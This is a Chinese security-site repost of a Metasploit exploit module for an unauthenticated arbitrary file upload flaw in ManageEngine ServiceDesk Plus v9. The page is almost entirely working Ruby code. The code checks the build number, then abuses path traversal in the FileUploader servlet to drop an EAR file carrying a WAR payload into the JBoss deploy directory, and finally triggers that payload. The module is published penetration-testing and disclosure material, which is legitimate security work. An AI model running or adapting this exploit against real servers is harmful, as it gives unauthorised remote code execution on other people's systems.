首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ManageEngine ServiceDesk Plus Arbitrary File Upload
来源:metasploit.com 作者:Ribeiro 发布时间:2015-10-08  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ManageEngine ServiceDesk Plus Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus.
        The vulnerability exists in the FileUploader servlet which accepts unauthenticated
        file uploads. This module has been tested successfully on versions v9 b9000 - b9102
        in Windows and Linux. The MSP versions do not expose the vulnerable servlet.
      },
      'Author'       =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'ZDI', '15-396 ' ],
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/6038' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'  => false,            # Privileged on Windows but not on Linux targets
      'Platform'    => 'java',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'ServiceDesk Plus v9 b9000 - b9102 / Java Universal', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 20 2015'))

    register_options(
      [
        Opt::RPORT(8080),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for EAR deployment', 15]),
      ], self.class)
  end


  def check
    res = send_request_cgi({
      'uri'    => "/",
      'method' => 'GET'
    })

    if res && res.code == 200 &&
     res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/
      build = $1
      if build < "9103" && build > "9000"
        return Exploit::CheckCode::Appears
      end
    end

    return Exploit::CheckCode::Safe
  end


  def exploit
    jboss_path = '../../server/default/deploy'
    servlet_path = rand_text_alphanumeric(4 + rand(16 - 4)) + ".up"

    # First we generate the WAR with the payload...
    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => war_app_base })

    # ... and then we create an EAR file with it.
    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}

    # Zipping with CM_STORE to avoid errors while decompressing the zip
    # in the Java vulnerable application
    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    ear_file.add_file(war_app_base + ".war", war_payload.to_s)
    ear_file.add_file("META-INF/application.xml", app_xml)
    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"

    # Linux doesn't like it when we traverse non existing directories,
    # so let's create them by sending some random data before the EAR.
    rand_file = rand_text_alphanumeric(4 + rand(32 - 4))
    res = send_request_cgi({
      'uri' => normalize_uri(servlet_path),
      'method' => 'POST',
      'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'uniqueId' => rand_text_numeric(4 + rand(4)),
        'module' => '',
        'qqfile' => rand_file
      }
    })

    print_status("#{peer} - Uploading EAR file...")
    res = send_request_cgi({
      'uri' => normalize_uri(servlet_path),
      'method' => 'POST',
      'data' => ear_file.pack,
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'uniqueId' => rand_text_numeric(4 + rand(4)),
        'module' => jboss_path,
        'qqfile' => ear_file_name
      }
    })

    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
      " seconds for deployment")
      register_files_for_cleanup(jboss_path.gsub('../../','../') + "/null/" + ear_file_name)
      register_files_for_cleanup("Attachments/null/" + rand_file)
      sleep(datastore['SLEEP'])
    else
      fail_with(Failure::Unknown, "#{peer} - EAR upload failed")
    end

    send_request_cgi({
      'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
      'method' => 'GET'
    })
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Watermark Master Buffer Overfl
·RedHat Enterprise Linux 7.1 De
·IconLover 5.42 - Local Buffer
·LanSpy 2.0.0.155 - Buffer Over
·ManageEngine EventLog Analyzer
·LanWhoIs.exe 1.0.1.120 - Stack
·BisonWare BisonFTP Server 3.5
·Last PassBroker 3.2.16 - Stack
·PCMan FTP Server 2.0.7 - Direc
·Watchguard XCS Remote Command
·FreeYouTubeToMP3 Converter 4.0
·Watchguard XCS FixCorruptMail
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved